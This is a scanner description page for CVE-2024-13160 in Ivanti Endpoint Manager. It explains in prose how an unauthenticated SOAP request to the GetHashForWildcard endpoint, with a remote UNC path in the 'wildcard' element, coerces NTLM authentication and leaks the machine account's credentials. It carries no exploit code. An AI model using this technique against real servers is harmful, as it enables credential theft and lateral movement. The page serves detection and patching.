CVE-2024-13160 Scanner

Ivanti Endpoint Manager (EPM) is a comprehensive solution for managing and securing endpoints across corporate environments. It is commonly used by IT administrators for asset management, patch management, and security configuration across a range of endpoints. The tool is designed to streamline device and application management, ensuring secure, automated processes for corporate systems. However, a critical vulnerability has been discovered in Ivanti EPM that could allow an unauthenticated attacker to exploit its GetHashForWildcard endpoint. This vulnerability is primarily found in versions where proper input validation is not enforced on certain parameters, exposing systems to unauthorized access. The system is designed for enterprises to protect their infrastructure from a variety of cyber threats. A patch or mitigation is required to resolve this security issue.

This vulnerability allows attackers to perform credential coercion attacks. It arises due to improper input validation in the wildcard parameter of the GetHashForWildcard endpoint in Ivanti EPM. By specifying a remote UNC path, attackers can force the machine account to authenticate using NTLM, leading to the potential disclosure of sensitive credentials. The vulnerability is triggered via a crafted request to the endpoint, which doesn’t properly validate the provided input. This lack of validation could allow attackers to bypass security mechanisms and access sensitive data. If exploited, the vulnerability can provide attackers with unauthorized access to internal systems or services.

The vulnerability occurs specifically when the GetHashForWildcard endpoint is called with a malicious input in the wildcard parameter. This input points to a remote UNC path, which then triggers NTLM authentication, leaking sensitive credentials. The vulnerability is caused by insufficient input validation, allowing attackers to inject a crafted payload into the request. The affected endpoint is located in the WSVulnerabilityCore service, which accepts SOAP-based requests. The request can be crafted using the 'wildcard' element, which directs the vulnerable system to authenticate with a malicious server under the attacker's control. Exploiting this endpoint requires no authentication, making it especially dangerous for attackers with network access.

If an attacker successfully exploits this vulnerability, they could coerce the targeted Ivanti Endpoint Manager system into authenticating with a remote server under their control. This could lead to the compromise of sensitive credentials, which could be further leveraged to gain unauthorized access to additional systems within the network. The exposed credentials could be used to move laterally within the organization, escalating privileges or compromising other services. The attacker may also use the leaked credentials to launch more sophisticated attacks, such as credential stuffing or brute-forcing other accounts. Overall, this vulnerability poses a severe risk to the confidentiality, integrity, and availability of the targeted systems.

REFERENCES

• Ivanti Endpoint Manager Multiple Credential Coercion Vulnerabilities
• CVE-2024-13160 - NVD